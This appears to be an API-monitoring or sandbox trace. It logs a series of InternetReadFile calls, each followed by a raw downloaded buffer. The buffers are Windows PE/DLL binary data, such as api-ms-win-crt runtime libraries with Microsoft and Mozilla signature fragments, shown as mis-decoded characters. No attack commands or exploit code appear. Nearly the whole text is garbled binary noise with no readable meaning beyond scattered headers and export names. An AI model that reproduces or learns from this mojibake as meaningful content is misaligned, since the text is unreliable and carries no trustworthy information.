buffer: ¼›³‘±“]âÿy¡Ѹ5öá‘Ê÷qìýþŠÃàe5Xˤ^–æ§"¯hó>ÏÞ¤ªØî¤â¡‚t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:7AB5-2DF2-DA3F1%0#UMicrosoft Time-Stamp Service¢% 0 +Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž2 Á0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŒÈ0"20180419214648Z20180420214648Z0t0: +„Y 1,0*0 ރŒÈ0³0ž0 ބÞH06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚ÑyÄ £§"?ïk¤££’o ˜x³³[p ³&PA{[:$!·ÃÊérªÅò\Òxòš¶°+ò¢JYÀý?ÑumDÅÃeQAe¾MPþ~u«‡{_gùk‡À¦ P{ªvz¥Të§åÃ(±ÚLSAì¬E¶y~Ø SJ}Í©´ãMç;õXƒt¦EV‡‚؈SÑÕù–4¯X¥F¼wÎXä .÷&Yµ`_ | Á¼çØwCC)ôöIZˆ]ײ£ÌíZ÷·ŠËŽ`Øè¡ßUÚ7\„'§oKq¯ÝWóÎu ßÝ×v…ôHd /ʅ![³R±ne”=äŠäžØÀ1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" w ºbæ7•‹dG×öc°¥•ž¼8>O…íf·T70â *†H†÷   1Ò0Ï0Ì0±Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž20˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚/cº¶Ÿcq"ÑéAæ^ìOo¿]¿.¶¶·‡3,ž*"¡Ïuh¤ÓDiÙu…¾¸ÇäÁ˽vr9ɦ½!7¤J÷ŠsøöIȪsÈk/JÊÊ1Åo>¬‘_å"µE!á‹vãàþ†sDs? ʾޜ$сÛÆÇ|*£Órãъ˜Œ}g¼zª\öŽ¶wÒcl q2<‰wȋú¥YæDÜÎí»S½õ»ƒÑĬ”n«…ug\W‡ÛxÊ1ìò´Bˆ¶Ë8ðï‘Éœ•$øâÚ±QwñŒÂäÀâ8ƆfҞĜRÚÍ>Ut–Ý‹yHÑS©˜¸"N5œ4¨œMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELÖùâ#à!    0ä@" ð =
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ï¯"&àÅ~­6jœp‚(࿼Ã!¤@kWWÒðžk- FȧÇGþ„•›{Oœ#å¬þ o/>{Éu»I‹üŽ¸DÝú²çú¡‚t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:12E7-3064-61121%0#UMicrosoft Time-Stamp Service¢% 0 +9p%‹ÈyÝ_ ]鋜³”™÷· Á0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރ‰Ï0"20180419213407Z20180420213407Z0t0: +„Y 1,0*0 ރ‰Ï0á0@0 ބÛO06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚Õ8\ÿ ôBˆ‡-n;“£mmÖ÷ŸÄÐòB½.òxƯ̂¿ùçq²[/f?\ èž=ÅÎC¸»ºÉOTsÀÆ@›Âû¯ ‚=jÎ$ÒÀ§J©µiíèÉ5$ïÞ¥ߨPåõ”Èȟ¼¡eqõÑanáúÒ#J'eý­9ÞܢєàÊQWàv4 N"ؘ6‹ä¾TÞ¸¥gdü¸ÊE܁A Ì]µ1Žùè’¥­Ño“Ú$ók ·®“’ âHKŽ8!ˆ/Ó}ÁH.cK×õˆrWeםÿe¢€½²,þœØå&í@f%4¾íFDJI1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" PÚ9ÎTÑä×õªÉÉ:æ;-Û¹4ç}á³ÈxxÛ0â *†H†÷   1Ò0Ï0Ì0±9p%‹ÈyÝ_ ]鋜³”™÷·0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0tìüe¨i©™¸¶Tÿÿ‹•½øYÂ0  *†H†÷  ‚UŠu/}tøÁ$1z<¯*t :À×d§4ëˆHà˜¿,Þ©ÓÚɟÑмîo`¦’üBؑ& Š!˜¼[:c´A!†d]o¡ªÆ)¬~K‚µÃ<%~*¨ü $ þ™ô‚é&^ë³³˜Vjô|ÔAÀ¶TùøÅa \‰ÉŽ+òÈ}z3Ã:?à]çZ3 ZýPPÓr¨'_?&ÕÛXÏ„E’UrÔ6aÜF_ÞüXv-·y]õiÑþ¢zv½7Y.'€¤ÙQвn'U‚zô”wŠýØóm‡Ó?Y'#H3R"§‡¿šr¸ŒþI)U“4¿’0—ïX%MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL(˜‹ßà!    0V0@ ð
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚–‹Ôù©Ž—ßø(@0)-Ê1vóÔêͬBU^nÌD¹“ÅbÇ9&š]®ŽpeÛHß)tUö®nåú)l— ²“¯•‘XàϸyÛÝÎIånZR†ʯµ>G^v­MÙú¨dËHÝËÓV¥Dš£Ÿ¬9l#QŸ™ZœEö¡éMG=óNê#ÄÀç·à™ õº~³Ðd9ñBˆJS’ɵjYüV/3< =³–Ei/ÝkâRc¬ ÄRƒÿa j47d>L¸ˆÙÞNG¤¿j$Æ-ow7kôp¬©/«”.?—‡Ûk¯Ý}}¿ŸR÷ÕÇ´úðŠ¨¶ï$¼øï"jšæMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELî±üÒà!  .@ P©â@×+@ð4=T.text×,. `.rsrcð@0@@v˜î±üÒ7ddî±üÒ dœœî±üÒRSDS9Öëƒè2éšÐ´R1Eapi-ms-win-crt-math-l1-1-0.pdbd.rdatadœ.rdata$zzzdbg×+.edata@`.rsrc$01`@.rsrc$02î±üÒl::(ø“¬Åßø(@XqŠ¡¹Òê4Mg‚¸Óî = i • Á í !E!o!™!Ã!í!"F"s""Ç"ñ"#E#o#š#º#Ò#î# $)$D$\$s$ˆ$ž$¶$Î$æ$þ$%*%D%`%z%”%­%Ä%Ü%õ%&)&C&]&u&&©&Å&ß&÷& '%'='Q'b's'ˆ'¢'»'Ò'ë'((9(Q(i(…(±(ê(#)[)’)Ë)*;*r*ª*â*+"+=+^+|++ž+°+Ä+Ú+ñ+,,0,G,\,p,…,›,²,Ç,Û,ð,--2-J-c-{--¤-¹-Î-ä-û-.,.D.Z.p.‡.Ÿ.¸.Ð.å.ù./"/6/K/a/x/Ž/¢/µ/É/Þ/ó/ 0 050J0b0{0’0§0»0Ï0ä0ü0151L1^1q1…1š1¯1Å1Ü1ò12242H2]2s2Š2 2
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" Û~T- "Nö@Ùa©ÜKó2{ÌZ•ôhbãó7 ë0â *†H†÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚O0Æn¶XÄ®3uVdõÕ ci¾56m¸m•YÏ«w?vü'z}B¯D¼–„&Ư­ ô’Býšµ«JA¼x¼ÓU]{ËË Ð43¡:ü¾y³ýÊ<ѱª5 ƒ ÔùG·ƒ67‡îƒlDV&þ [<GÌn>~J cm ˜¥¼¹öÔÒÿ T ØmI'.]ò´P¢©ÛÆˁmϬ®lTja@HŠ@z?wçÞ±¢SÆâåÞK½gÜȳüo°ñyu+Û7® \ß6É͎âC±,ÍûÜ﫫욺·!´­^K$#1Äe®³X+YÍÿpšjtÖ8™MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL2¨à!  $@ Pı@ô @ð*=T.text"$ `.rsrcð@&@@v˜2¨<dd2¨ d  2¨RSDS £Nq‘€Í6ð ¹,¿Fîapi-ms-win-crt-multibyte-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgô .edata@`.rsrc$01`@.rsrc$022¨ÈÈ8Xx;`‚¥Èë1Tw›Àã'Lq–¹ÚüBeˆ«Îñ7Z} Ãæ +LmŽ­Êç!>^¤Çê 0 S v ™ ½ â !)!K!l!Ž!±!Ò!ñ!","K"g"‚"Ÿ"¾"à"#*#O#o#Š#¨#É#ê# $-$P$q$$±$Ô$ô$%/%N%m%Š%¥%À%Û%÷%&2&Q&o&Œ&¨&Ã&Þ&ø&'3'R'o'Š'¥'À'Û'ö'(2(Q(p(‘(´(Õ(ô()2)R)
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: Ó5¢çÜâԅ=0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¦ýRà‹'?¦0™·l T=A„Á‰g>Häg0  *†H†÷  ‚®ÏKÊ44âÊ¢‰Y %hÓ쳛ô¨ŽE©¿\’èï ÷µt¼ ‹¾¶³ñ¶ðä£áÃכU®ˆ:ÓRbâeÓ©Š+`ÛõÜéŒÿÜ;Ó Œ´×ˆ‹Q֑~ˆ(ôA`HàK0¢%«~ÞìMB4Î?Øsêô&\¦~Áñxs€ù!Zô·«"ÐÞcwâ¦gKW² cöL3å0밈c»Ïp9?q0Hʨ̵ª^Ã7QªÓE¶µuŸ}èàM¡ü$`öàkIço eÏnŸ¥ŠcïeìQâ[h%‹tì¦Â­ÍbÛx2¡Ðš0—°qÄ#Ƥ‰_ L_Àސf·•bÏL@MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL’œÓÊà!  0 @’Ú@Å0ð=T.textÕ `.rsrcð0@@v˜’œÓÊ:dd’œÓÊ d  ’œÓÊRSDSÝm©q|3í;³/>n5^Èapi-ms-win-crt-runtime-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgÅ.edata0`.rsrc$01`0.rsrc$02’œÓÊfkk8䐎«Íò4Ss”µÖøEgŠ­Ìí )Nn†ŸÈý&Ef·ß'DjªÈè >…ËJn²;a‚²ó2b°ö1YŒÚ C l ™ Ä ê !2!V!Ž!Ç! "P"n"ˆ"¦"Ä"ã"##<#Z#u##¡#½#Ý#ÿ##$D$c$…$©$Ê$ç$%%9%W%p%%¨%Â%ˆÂá )Hgˆ©Êë7\{¢Áà?f–±è:Y|«Ìû=T‰ž¿Úÿg¬ó>_†ç.Qz“ÚXu–Ó"Ir¯ 3 \ … ¶ Û !'!F!o!¶!á!B"g"~"›"º"×"ø"
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:  Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103©TpÙyÀ„eâ©0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" }|{4ýàèøî˜Þ³ŸÒ™w$ —U»rSÇ}±^ÿ£0â *†H†÷   1Ò0Ï0Ì0±]:¿V½á)Êrd÷u;x"ëô0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103©TpÙyÀ„eâ©0 SâdIëO‘ m˼&TÔj0  *†H†÷  ‚( ;£j€›ªˆˆM¦ì$HìSw0¼ÔB?Ín\ÅÔ´¬©Á?Øí§ð,‘ÒØ6OãVp“Q{‚>ӐOX‚Ò§ Är8,ª8¬)› MKz¸Òû–jg›œ`‚ý³ÑÈHÏ©<1Å÷7÷¹V.e3½Å±œ›Íûäo¹¢ ™ÒÉ`½Ð¢ç6Ó²+¢b5I´IE®ÔW(¥×aó—„ 9?uI‹ÎϜß­¸ÊKV{À$ȄiZ Š Ü­%ÝF¦0划¾wS”23óPZÀ‘!§öɆký»[Ù4k9ƒ”_ì ß}Í²Mi|njSIUãh¾MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELì½Gà!  0 @»ˆ@a0ð"=T.texta `.rsrcð0@@v˜ì½G8ddì½G dœœì½GRSDS9uGºlÂk‹‰yˆ‹ìÖapi-ms-win-crt-stdio-l1-1-0.pdbd.rdatadœ.rdata$zzzdbga.edata0`.rsrc$01`0.rsrc$02ì½G^ŸŸ(¤ Ž´Õ<y³ì)h¤à ]˜ÕH…Ä)D^vŽ£·Ëè .Tu—ºÚþ9Z{Àâ 0Qu—¶×û$ G j › Ù !)!C!b!~!›!¹!Ò!ì!""6"P"k"†"Ÿ"¾"ß"ö" #)#E#b#€#–#¬#Ç#ô##$B$[${$$µ$Í$è$ %1%R%l%†%¡%¾%Ý%û%&3&N&f&~&–&¸&Ü&ù&'2'O'l'‡'œ'±'È'Þ'õ' ("(9(O(f(}(
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 0±Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž20˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚7ú¦ÃŽéɏ¹•N)^© òàsßÖF¸Üg ȂôFUa°@î'£„r픕 ð1´ƒj´u°µ¾˜(e7ºÝoŸï-é9VU¶ ù—µrêb”ã^^5ä„|[ø°u†xôéšrvé9gÐèðfªwÃHÉ.Âë§à½ÊÁ1>†Pþx9s¤uå·-øä6º†µ{ÊŸ.kUæw$†á0:òsµ7¶kŠSè Zª/!N툰Òà_LúM'61ðfÉB_ô0 p3¥gtØß¿˜Ì1í¸ÌKwªv~Ìï1F®§1©,„…ýo§¹Ð˜Û²/ž‹â˜ŸpÄöMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELbýMGà!  0 @Pœ@ß0ð"=T.textï `.rsrcð0@@v˜býMG9ddbýMG d  býMGRSDSàå'ÍÓ©”Å‘û! škapi-ms-win-crt-string-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgß.edata0`.rsrc$01`0.rsrc$02býMG,²²8ÈWs¬Êè#Ba€ºÙø<[z™¸Øù;[{œ½Þÿ Abƒ¥Çå<Xr­Ìé!@_~¼Üý9Un‰¤¿Üû 8 U r  ¯ Ð ð !&!C!a!€!!¸!Õ!ô!"2"Q"p""±"Ð"í" #"#=#X#s##¯#Ï#ë#$!$:$S$l$…$ž$º$Ö$ï$%!%:%T%o%Š%¥%À%Û%ö%&,&G&b&}&˜&´&Ð&è&þ&'3'M'd'}'–'®'Æ'ß'ù'()(D(_(x(“(®(Ç(ß(ö()))B)[)v)’)­)Æ)ß)ø)*(*A*[*s*‹*¦*Á*Ú*õ*+)+A+X+q+‹+£+½+Û+Mj…¢¿Þû
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ®{ë]ŠƒìårŠ  ¥“>ÔK#ÔÂoHæÂùS˜Ê³¢áá]u€ä3Ô¨_û MÄaÄ<£úÎ̤å1ì¡P¦§ v”Cª/<̃ûþµÎ/¥ÆÈ®¢#ú6ëzfÛ¨“ Öù†ìèW@À¡¡<ډrÅl‰N?çou8/«–'羸¯ÖîÇÜêeÖIÛΌ2@hŠ5[ Tý0ï"mìí;MÆTê-|jŒ "éï)l³ç;7RòÅê”×4&qüÅ´XÆpÖB e\æ0¾²D¹%shח”œ¬aMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELÀ#Šà!    0¸í@½ ð=T.text½  `.rsrcð @@v˜À#Š7ddÀ#Š dœœÀ#ŠRSDSàV¾m‘w:Èd›þ9 |]mapi-ms-win-crt-time-l1-1-0.pdbd.rdatadœ.rdata$zzzdbg½ .edata `.rsrc$01` .rsrc$02À#ŠøHH(Hh =\z˜¹Üü8VsŽ«Èå&Da~›¹Ö÷?bƒ¢Áàÿ!Fk´Õô0Nk‹©ÆâûEe~™µÔõ3Rq¯Îí )D_x«2Qp¬Ïò.Kj… ¿Úù;Vu¯Ìé1Vw˜µÖó7^¨Éê$E` »Úó 5^u«Èé 'He†£Äá<Ur‡¢  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGapi-ms-win-crt-time-l1-1-0.dll_Getdaysucrtbase._Getdays_Getmonthsucrtbase._Getmonths_Gettnamesucrtbase._Gettnames_Strftimeucrtbase._Strftime_W_Getdaysucrtbase._W_Getdays_W_Getmonthsucrtbase._W_Getmonths_W_Gettnamesucrtbase._W_Gettnames_Wcsftimeucrtbase._Wcsftime__dayligh
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚/HõêN¸5lœà}1Ÿô¿pZ±±}ʐ g+ùO1õ ¨1¨€ ÿ±C ÍH‚¸•ÿÜÒÒ[ñOB²¢¼õȆwXüŽPæ`¨<° Þ-yLM¾ƒà]Ñ«dÿ¨•‘‘–¦È•Ã™!úP%ʍÝJ–¤¶èTvNi´cQÝ6ï¼ÉŸä²Ö‰R.H4VW&R‘üûbœQW}/zhoݯŠ/ÇHÍqŠ³V⊺–t¨mâ·çbÆb XW{íR?s~X ܐAܨ\•s¤*ŸÒ €±õ -±ƒaF}N°Ô ¿C+¸ï’üJÜbM”ö#O%¡MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELêËŠà!    0Né@^ ð =T.textn `.rsrcð @@v˜êËŠ:ddêËŠ d  êËŠRSDSR”dYßDïüëëF»œapi-ms-win-crt-utility-l1-1-0.pdbd.rdatad¬.rdata$zzzdbg^.edata `.rsrc$01` .rsrc$02êËŠd8°(®Ø#<Ul…¢¼Óê+@[r‡ ¶ÉÝò4I_†Èñ3Ne|—¶Ëäù'8Qn˜±Ä×ì/BY api-ms-win-crt-utility-l1-1-0.dll_abs64ucrtbase._abs64_byteswap_uint64ucrtbase._byteswap_uint64_byteswap_ulongucrtbase._byteswap_ulong_byteswap_ushortucrtbase._byteswap_ushort_lfinducrtbase._lfind_lfind_sucrtbase._lfind_s_lrotlucrtbase._lrotl_lrotrucrtbase._lrotr_lsearchucrtbase._lsearch_lsearch_sucrtbase._lsearch_s_rotlucrtbase._rotl_rotl64ucrtbase._rotl64_rotrucrtbase._rotr_rotr64ucrtbase._rotr6
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" È÷ ^OëCšÔÚߧMcO ,šl/ââÉ‘äãb0â *†H†÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚±[‘”4êª*ï"ØÞnƨ:é'ŸÛпÅÚü7Ùۃ}ـ¢±¤!öÙ¿T®~&XºØ½eW\Øÿ’Æ2P9Ùòïý¾ §-àÅ1#ڜÁ­ÙÔP‚WãùTÁŠ¢€ñÁ„ g ìŠÜ"{…¼5;†Ð3~þx7³y«4÷Þ×Ê!†T{&þÛ»õniøZOÿð&ÚHR“P; ʪދ @Ê噎bEًö R+Š™ ±ÇøCµBÔȐ5 R›e•“H©d°ÛðMIÙ´¨ð”¢rË|ªå(@™m×d÷ v ˆÎR;’…I¾« (€Å!-o¯À»ù£ÍMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL9î¯`à"! ¨:p¬@—6@Aµ>´Iiˆ|ð¨æ¸=Ü6,â8À  Ž$Ü=`.textö§¨ `.rdatatìÀî¬@@.data´°š@À.00cfgО@@.tlsà @À.rsrc¨ð¢@@.reloc=>¨@BU‰å‹MÐ]ÃÌÌÌÌÌU‰åSWVœX‰Á5 PœXº9Átº…Ò„¸1À1ÿ¢…À„ª‰Æ1À1É@¢‰ÈÁê$€â¢U¶‰ÈˆT¶Áè $þ€¢V¶ƒ ‰øº‰Ï¢W¶‰ÈÁè$¢X¶‰È!ÑÁè$9Ñ¢Y¶…‹1ÉЃà1ۃø”Z¶ƒþrƒøu¸1É¢Àë€ã‰øˆ[¶Áè$¢\¶^_[]Ã1À¢T¶¢U¶¢V¶¢W¶¢
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ÁÖÈ\Aÿy_PT¡†–º­Å 9¸rŽP*Ò_K3°K¥Þå5яû’A±Aú/w¢Æ´ø͚/P Þý)Z}Ràû§«/FvÚWúǁHŽ »Ëã+ƒ,</5»GêWrøb]pî0¯BïNxöôŸÉhi }³÷MÍ TO¬­Š»/€ÈæãǑð¦#O~…âh·kÚG¯…žëÚlX×â{j5xêÀ¶`FåùàMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELMî¯`à"! B°?°ìò@A석ô!T pT¸°¸ÿta`  'X.text®AB `.rdatatÜ`ÞF@@.dataÌL@*$@À.00cfgN@@.rsrcp P@@.reloc¸ÿ°T@BU‰åSWV‹}ƒÿ r*hNhëTh¥<h/djèCƒÄ¾‰ð^_[]øy¾èl¹o‹U£øB΋…Ût‹ p@‰ÖÿSÿщòƒÄ‹½”l‹M 1ö…Ò‰q‰‹ ½¼l‹}‰‰wt ‹M‰¼l…Ût“‹ x@ÿSÿуÄé|ÿÿÿÌÌÌÌÌÌÌÌÌÌÌU‰åƒ}t‹ p@ÿ]ÿá]ÃÌÌÌÌÌÌU‰åƒ}t‹ x@ÿ]ÿá]ÃÌÌÌÌÌÌU‰åWVƒäøƒì‹@‹M‹Et$‰ç1ê‰T$1҉V‰‰W‰QWVPèÈþÿÿƒÄ‰Æ…Àu‹M ‹T$‹E‰‹ $‰‹L$1éè6‰ðeø^_]ÃÌÌÌÌÌÌÌÌÌÌU‰åSWVƒì¡@‹M‹} 1è‰Eð‹q …öt‹ p@ÿVÿыMƒÄƒÿ ‡&‹U‹Eÿ$½ Çlj֋U‹„¹‰‰ø1ÿ…ö„yDŽéi€y[u ‹Mè÷½‹M‹A1ÿ…ÀŽ¥º1ö‹I‹ …É„‹‹A‰Mà‰U؉}ä‹·ƒŒ‹‹˜‹“ԍD<‹ œ@‹z,‰EÜÿWÿуĉNj L@¯}ÜÿSÿуÄø‹M ƒ˜ƒù u ‹Mà™‹I÷yD‹}ä‹M‹UØNjAFƒÂ9ÆŒiÿÿÿë‹Mëí€y[u ‹M脽‹M‹E‹U‰8Ç1ÿé€1ÿGéxÇEì€y[u ‹Mèÿ¼‹ME쉁øƒyŽ81ÿ‹A‰ùÁá‹\ ‹M…Û„‹ P@ÿjÿуÄ‹K,1ÒK KK<¯È¸Mì‰Mì‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ‚7 10¡€https://mozilla.org0  *†H†÷ ‚mˆÒ@*C(ÈҚ>v»ÛãL!©¦Çï@Œ(×±$AU$³pÕ4Wƒ²ØV̙°¼Uê¨î—¶E5_ a­Æä²È¡Â}ð.€ÇŸ| \–%»·,''§»beˆP:¤VEeø?Æ;?èš{ôgÍì,C<rÁ՛8´è°Ø[Ù»= k\4r§³¤Ž0s"ÄéÕ®€PseS­8ïó[ s~p—Kv$,õþp „4HEk<ùY0ûœ‹¹ ö@n#&òÄ٘¥Z͋BNªº´Ô§ 5¤U¤>&;Ì°7ð”$ò;Óem}•â¶-߈QïR{·0µ(x(š´ÉÒîǓ*ѧÞMOx6ä Rò ‘ò© 27ãNHMϯæ·`ºáא.ùО_;q¿Bf9* @kÏ©”±di£°i¿»‹‰Äz ¹lÓèÜ©Ž5Î V2ìÕ¼ü{e³ z­/öP!šEHë’ËÕã3I²«g6õž¢®ÒiT…_m‡Ÿ ñ?Ep0/n[ÝÚÃZ:W¯«{Š£¿2ÒÀæ”*úìÈÙ.™i¶³Æ›z)k¹é<YÐG,OÒV#¹{…¥Ó jî(œñ’r†ÈAÞ}¥¯ìð¾ÇPt\ë·Gø¼=+‡d¹:2Wc­Àx¡‚00‚, *†H†÷  1‚0‚0†0r1 0 UUS10U  DigiCert Inc10U www.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ˆÿ`@!ÎðÝ0  `†He i0 *†H†÷  1  *†H†÷ 0 *†H†÷  1 210527192334Z0/ *†H†÷  1" Ååuš`²€ºò³$‹ÍÌt?yÉ‹©L3Ջ×ø2c0  *†H†÷ ‚¦ÑÔvžX÷¼V©úÿ™ö¶½ÞMLµªUu–˜>A:•fU-(H¬$86Ö¬ÊH »¸@›ú2€jq “æªÄ½«âN傊‹<98ä-­j$xÙßísWêĖùŒ¬ŒÃ s:)Œ¯Ü(BàÑ÷I“n…ÄÙ¤ÒúA ðèM;e˜¢Q_Mڌ%íHôœN’¹·§Sk͸%¢ßE휾¹öÕw%ÿsYÐËÏ免õ=²žâ)9ÎíØ2;qÅ*`iòY»–8-`;mɼã9©­^kZðlïÔM.z.i«¡Êx‹ÛÒ8ÕôµºŒ3»,–ÁtMZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ºùå¬þ˜‹ÿþ˜‹ÿþ˜‹ÿJdÿü˜‹ÿ÷àÿõ˜‹ÿþ˜Šÿ֘‹ÿvÿþñ˜‹ÿvÿˆþ혋ÿvÿŽþû˜‹ÿvÿƒþ嘋ÿvÿ‹þÿ˜‹ÿvÿtÿÿ˜‹ÿvÿ‰þÿ˜‹ÿRichþ˜‹ÿPEL ú>[à"! æ P® @¡8@A°ë ¸Œ @?0¸  8È @´.textÄäæ `.dataê@À.idata„ì@@.rsrc ò@@.reloc¸ 0 ø@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: hington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" o•3JÇK€5¼’€2ïļ?ֆ"E$E:ë_0â *†H†÷   1Ò0Ï0Ì0±9p%‹ÈyÝ_ ]鋜³”™÷·0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0 ½¿iäýø—_Vòí¥oŒøÜk0  *†H†÷  ‚YÕvT3¸e[Ö³HÄر C•DK›±…*ùÁo¢ì‹íEÔ¥ßÑrƒzàa7Dh Z¨ã§’Õ`6ŒØÚþ't¸WþV@½6B5 ëÚ4\RJ—5`««»‡„{þy´Šgè48ÕpNÙ݅wÇ@‘b¨ZŽ MQ¦Î—jŽŸëº¼!Ø0 žÐN_?%Š-È 1³‡"e™Ü·’yÝ@&ºð}$Þt®$–ÈJ¢2Hûg„!‘è“ÂZw@hÕÍ"´JŪ¥ýùçß" X#®eâx*ÜÇï÷ó@?³×3OòÍL¶jΰÔ<xe0MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELxî¯`à"! ä20é° êå @A ú S_ú Èp p ¸€  #dô  hü @.textOãä `.rdataŒè@@.data0F î @À.00cfg` ð @@.rsrcpp ò @@.reloc #€ $ö @BU‰åhOè²âƒÄ…Àt‰€8ƒÀƒàð]Ãhàÿÿè‡âƒÄ1À]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‰åWV‹E…Àt‹}‹u‹U‹M 